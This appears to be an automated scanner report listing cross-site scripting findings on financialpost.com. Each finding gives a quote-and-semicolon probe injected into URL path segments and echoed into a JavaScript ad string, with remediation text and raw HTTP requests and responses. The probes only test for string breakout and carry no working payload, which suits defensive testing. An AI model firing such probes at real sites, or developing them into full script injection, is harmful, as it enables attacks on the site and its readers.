The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e36a'%3b760d8d1d1a9 was submitted in the REST URL parameter 3. This input was echoed as 7e36a';760d8d1d1a9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Discover+your+true+competitive+advantage/39927817e36a'%3b760d8d1d1a9/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 70169 Expires: Sun, 19 Dec 2010 03:12:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/discover-your-true-competitive-advantage/39927817e36a';760d8d1d1a9/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=discover-your-true-competitive-advantage;kw=39927817e36a';760d8d1d1a9;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surrou ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c91c'%3bb0f449f0d2e was submitted in the REST URL parameter 4. This input was echoed as 1c91c';b0f449f0d2e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Discover+your+true+competitive+advantage/3992781/1c91c'%3bb0f449f0d2e HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:13:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 38647
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3dfa'%3bc1a1cb098d5 was submitted in the REST URL parameter 1. This input was echoed as b3dfa';c1a1cb098d5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executiveb3dfa'%3bc1a1cb098d5/Leadership+companies+honest+with+their+employees/3987151/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 74644 Expires: Sun, 19 Dec 2010 03:12:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executiveb3dfa';c1a1cb098d5/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executiveb3dfa';c1a1cb098d5;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=83962964?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43db7'%3b7532e4f4caa was submitted in the REST URL parameter 3. This input was echoed as 43db7';7532e4f4caa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Leadership+companies+honest+with+their+employees/398715143db7'%3b7532e4f4caa/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 71329 Expires: Sun, 19 Dec 2010 03:12:51 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/leadership-companies-honest-with-their-employees/398715143db7';7532e4f4caa/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=leadership-companies-honest-with-their-employees;kw=398715143db7';7532e4f4caa;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTa ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 69f5d'%3bbfa9b0eb109 was submitted in the REST URL parameter 4. This input was echoed as 69f5d';bfa9b0eb109 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Leadership+companies+honest+with+their+employees/3987151/69f5d'%3bbfa9b0eb109 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:13:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44711
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7cd1'%3b8a87ca5dda7 was submitted in the REST URL parameter 1. This input was echoed as a7cd1';8a87ca5dda7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executivea7cd1'%3b8a87ca5dda7/Leadership+make+good+decisions/3957410/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 79991 Expires: Sun, 19 Dec 2010 03:12:28 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:28 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executivea7cd1';8a87ca5dda7/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executivea7cd1';8a87ca5dda7;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=33160721?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea152'%3b5875384a269 was submitted in the REST URL parameter 3. This input was echoed as ea152';5875384a269 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Leadership+make+good+decisions/3957410ea152'%3b5875384a269/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 69799 Expires: Sun, 19 Dec 2010 03:12:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/leadership-make-good-decisions/3957410ea152';5875384a269/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=leadership-make-good-decisions;kw=3957410ea152';5875384a269;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bacb0'%3b92563dfa8ca was submitted in the REST URL parameter 4. This input was echoed as bacb0';92563dfa8ca in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Leadership+make+good+decisions/3957410/bacb0'%3b92563dfa8ca HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:56 GMT Connection: close Connection: Transfer-Encoding Content-Length: 45046
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae28c'%3bc70cc79a0a1 was submitted in the REST URL parameter 1. This input was echoed as ae28c';c70cc79a0a1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executiveae28c'%3bc70cc79a0a1/Organizations+fight+bureaucracy/3992875/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 88315 Expires: Sun, 19 Dec 2010 03:12:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:31 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executiveae28c';c70cc79a0a1/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executiveae28c';c70cc79a0a1;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=99274053?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c87f'%3bc33c1d433bd was submitted in the REST URL parameter 3. This input was echoed as 2c87f';c33c1d433bd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Organizations+fight+bureaucracy/39928752c87f'%3bc33c1d433bd/story.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 63883 Expires: Sun, 19 Dec 2010 03:12:50 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/executive/organizations-fight-bureaucracy/39928752c87f';c33c1d433bd/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=executive;kw=organizations-fight-bureaucracy;kw=39928752c87f';c33c1d433bd;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'or ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c799'%3bc87820a0f13 was submitted in the REST URL parameter 4. This input was echoed as 2c799';c87820a0f13 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/Organizations+fight+bureaucracy/3992875/2c799'%3bc87820a0f13 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:13:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:00 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44205
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b293e'%3b061095bc4ca was submitted in the REST URL parameter 1. This input was echoed as b293e';061095bc4ca in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executiveb293e'%3b061095bc4ca/canadian-mba-programs/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43656
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8f55'%3bcca8fb45330 was submitted in the REST URL parameter 2. This input was echoed as e8f55';cca8fb45330 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/canadian-mba-programse8f55'%3bcca8fb45330/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44440
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98aba'%3bb9fb836393d was submitted in the REST URL parameter 1. This input was echoed as 98aba';b9fb836393d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive98aba'%3bb9fb836393d/ceo/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:12 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37452
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9721'%3b486d1a1eccd was submitted in the REST URL parameter 2. This input was echoed as e9721';486d1a1eccd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executive/ceoe9721'%3b486d1a1eccd/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:26 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37416
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2a5c'%3bdbe23d485fd was submitted in the REST URL parameter 1. This input was echoed as d2a5c';dbe23d485fd in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /executived2a5c'%3bdbe23d485fd/hr/ HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:11:48 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:11:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43275
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c50a'%3b34e2fdea153 was submitted in the REST URL parameter 2. This input was echoed as 1c50a';34e2fdea153 in the application's response.
